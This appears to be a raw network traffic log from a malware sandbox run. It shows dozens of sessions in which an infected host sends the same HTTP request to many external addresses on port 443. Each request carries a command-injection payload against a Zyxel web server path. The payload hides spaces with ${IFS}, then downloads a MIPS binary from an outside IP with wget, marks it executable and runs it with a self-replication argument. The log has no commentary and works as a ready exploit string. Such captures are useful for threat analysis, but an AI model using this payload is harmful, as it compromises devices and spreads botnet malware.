                                                        Jan 28, 2024 10:12:50.362128973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3838192.168.2.1459576115.52.206.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362157106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3839192.168.2.1448416193.202.64.100443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362190962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3840192.168.2.1452124196.206.100.193443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362237930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3841192.168.2.1444930100.22.216.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362267971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3842192.168.2.145245238.189.100.32443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362309933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3843192.168.2.1436614164.163.8.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362364054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3844192.168.2.145400044.162.156.36443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362405062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3845192.168.2.1436566209.155.45.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362428904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3846192.168.2.1457218113.174.148.199443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362468958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3847192.168.2.1449468136.107.186.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362519979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3848192.168.2.1446852176.26.211.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362565041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3849192.168.2.1450612134.87.123.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362591028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3850192.168.2.145298259.87.133.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362612963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3851192.168.2.144449878.197.63.108443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362659931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3852192.168.2.1434092103.198.143.29443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362687111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3853192.168.2.14391641.83.81.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362698078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3854192.168.2.1455180130.230.222.73443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362757921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3855192.168.2.1448014123.238.228.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362792969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3856192.168.2.1440848128.14.177.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362818956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3857192.168.2.1457358160.185.71.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362849951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3858192.168.2.144165086.221.86.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362890959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3859192.168.2.1457082177.1.217.30443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362935066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3860192.168.2.144681068.186.161.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.362962961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3861192.168.2.145836836.0.82.166443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363004923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3862192.168.2.1447338138.129.58.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363042116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3863192.168.2.1456544210.140.219.216443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363065004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3864192.168.2.144746885.132.82.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363105059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3865192.168.2.1440892193.213.202.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363151073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3866192.168.2.1443012133.185.250.57443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363192081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3867192.168.2.145066039.18.68.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363226891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3868192.168.2.1459942161.229.203.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363277912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3869192.168.2.144799049.8.39.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363315105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3870192.168.2.1434486182.115.78.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363358021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3871192.168.2.1436132136.38.82.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363396883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3872192.168.2.1441822184.1.175.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363419056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3873192.168.2.146062820.187.0.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363454103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3874192.168.2.144501665.63.192.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363498926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3875192.168.2.1444612139.36.200.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363532066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3876192.168.2.1434776209.134.119.144443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363553047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3877192.168.2.1441468205.27.121.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363601923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3878192.168.2.145257038.71.204.35443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363657951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3879192.168.2.1446156154.141.116.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363670111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3880192.168.2.145803859.42.42.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363718033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3881192.168.2.1452306149.7.218.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363745928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3882192.168.2.1460110168.119.33.158443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363784075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3883192.168.2.1460684219.152.92.239443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363804102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3884192.168.2.145653284.8.214.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363857985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3885192.168.2.145494436.125.253.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363886118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3886192.168.2.144276877.34.70.247443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363929033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3887192.168.2.145382473.196.44.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363981009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3888192.168.2.1445790169.249.108.120443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.363993883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3889192.168.2.1446366203.139.60.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364056110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3890192.168.2.144612078.223.124.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364095926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3891192.168.2.14347705.91.130.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364115953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3892192.168.2.143971072.81.197.178443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364171028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3893192.168.2.144647272.43.164.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364192963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3894192.168.2.144769277.231.90.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364222050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3895192.168.2.1446134106.27.135.215443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364260912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3896192.168.2.145373824.190.185.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364300013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3897192.168.2.1439164181.102.191.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:50.364356995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3898192.168.2.145487813.8.169.134443
                                                        TimestampBytes transferredDirectionData
